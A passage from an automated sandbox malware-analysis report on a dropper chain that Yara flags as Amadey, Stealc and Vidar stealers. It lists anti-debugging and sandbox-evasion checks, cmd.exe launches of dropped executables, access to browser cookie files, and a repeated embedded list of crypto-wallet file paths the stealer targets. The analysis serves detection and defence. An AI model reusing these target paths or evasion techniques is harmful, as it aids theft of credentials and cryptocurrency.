Source: explorti.exe, explorti.exe, 00000005.00000002.2286152446.0000000000FFF000.00000040.00000001.01000000.00000007.sdmp, RoamingFHJDBKJKFI.exe, 0000002F.00000002.3317110228.0000000000E8D000.00000040.00000001.01000000.00000016.sdmp, RoamingHJKECAAAFH.exe, 00000032.00000002.3101997661.0000000000A1F000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696487552x
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000275C000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3085791494.000000000277A000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp, bfb8bb0dc7.exe, 00000024.00000002.3089031616.00000000027B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: bfb8bb0dc7.exe, 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarep
Source: 6SoKuOqyNh.exe, 00000002.00000002.2246081856.0000000000BDF000.00000040.00000001.01000000.00000004.sdmp, explorti.exe, 00000004.00000002.2273472137.0000000000FFF000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000005.00000002.2286152446.0000000000FFF000.00000040.00000001.01000000.00000007.sdmp, RoamingFHJDBKJKFI.exe, 0000002F.00000002.3317110228.0000000000E8D000.00000040.00000001.01000000.00000016.sdmp, RoamingHJKECAAAFH.exe, 00000032.00000002.3101997661.0000000000A1F000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: firefox.exe, 0000002B.00000002.3015090796.0000020633E70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bfb8bb0dc7.exe, 0000000B.00000002.3110870483.0000000022A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1RECOVE~1470bankoRecoveryImprovedVMware20,11696487552x

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	File opened: NTICE
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	File opened: SICE
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJKECAAAFH.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe

Code function: 2_2_04DB0C09 rdtsc

2_2_04DB0C09

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

11_2_00405150

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

11_2_0041ACFA

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00404610 VirtualProtect ?,00000004,00000100,00000000

11_2_00404610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

11_2_004195E0

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00419160 mov eax, dword ptr fs:[00000030h]

11_2_00419160

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

11_2_00405000

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0041C8D9 SetUnhandledExceptionFilter,	11_2_0041C8D9
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0041ACFA
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0041A718
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C67B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_6C67B66C
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C67B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_6C67B1F7
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Code function: 11_2_6C82AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_6C82AC62
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00409950 SetUnhandledExceptionFilter,	12_2_00409950
Source: C:\Users\user\1000003002\d27375200a.exe	Code function: 12_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	12_2_00409930

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 9104, type: MEMORYSTR

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

11_2_004190A0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe "C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\1000003002\d27375200a.exe "C:\Users\user\1000003002\d27375200a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\F1CD.tmp\F1CE.tmp\F1CF.bat C:\Users\user\1000003002\d27375200a.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4B76.tmp\4B77.tmp\4B78.bat C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingHJKECAAAFH.exe "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"

Source: explorti.exe, explorti.exe, 00000005.00000002.2286152446.0000000000FFF000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: XAProgram Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_6C67B341 cpuid

11_2_6C67B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

11_2_00417630

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\d27375200a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\1000003002\d27375200a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

11_2_00417420

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,

11_2_004172F0

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

11_2_004174D0

Source: C:\Users\user\1000003002\d27375200a.exe

Code function: 12_2_0040559A GetVersionExW,GetVersionExW,

12_2_0040559A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 4.2.explorti.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 50.2.RoamingHJKECAAAFH.exe.830000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.6SoKuOqyNh.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.2.RoamingFHJDBKJKFI.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.explorti.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000032.00000002.3100288040.0000000000831000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2232316189.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2245619240.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2273315501.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2245966908.00000000009F1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2203138174.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.3316222838.0000000000CA1000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3056372409.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2286029441.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.3027185074.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2691951634.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000024.00000002.3089031616.000000000275A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3085791494.0000000002727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bfb8bb0dc7.exe PID: 9104, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: bfb8bb0dc7.exe PID: 3152, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: bfb8bb0dc7.exe, 0000000B.00000002.3076969735.00000000005AD000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo 